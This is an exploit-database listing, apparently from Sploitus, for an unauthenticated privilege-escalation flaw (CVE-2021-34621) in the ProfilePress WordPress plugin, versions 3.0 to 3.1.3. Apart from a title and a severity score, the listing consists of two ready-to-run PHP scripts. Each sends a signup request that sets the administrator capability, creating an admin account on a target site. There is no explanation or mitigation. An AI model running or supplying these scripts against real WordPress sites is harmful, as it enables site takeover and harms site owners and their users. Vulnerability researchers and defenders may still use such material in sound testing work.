Exploit for ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation CVE-2021-34621

Name: Exploit for ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation CVE-2021-34621
Rating: 5 (77 reviews)

2021-06-28 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:AF54762B-29C9-4529-8EBD-F4BA7FDE2C95
<?php

// Settings
$wp_url = $argv[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'reg_username' => 'Hax0r',
    'reg_email' => 'Hax0r@Hax0r.com',
    'reg_password' => 'password',
    'reg_password_present' => 'true',
    'reg_first_name' => 'Hax0r',
    'reg_last_name' => 'Hax0r',
    'wp_capabilities[administrator]' => '1',
    'action' => 'pp_ajax_signup',
    'melange_id' => ''
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>

or 

<?php

// Settings
$wp_url = $argv[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'reg_username' => 'Hax0r',
    'reg_email' => 'Hax0r@Hax0r.com',
    'reg_password' => 'password',
    'reg_password_present' => 'true',
    'reg_first_name' => 'Hax0r',
    'reg_last_name' => 'Hax0r',
    'wp_capabilities[administrator]' => '1',
    'reg_submit' => '1',
    'melange_id' => ''
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>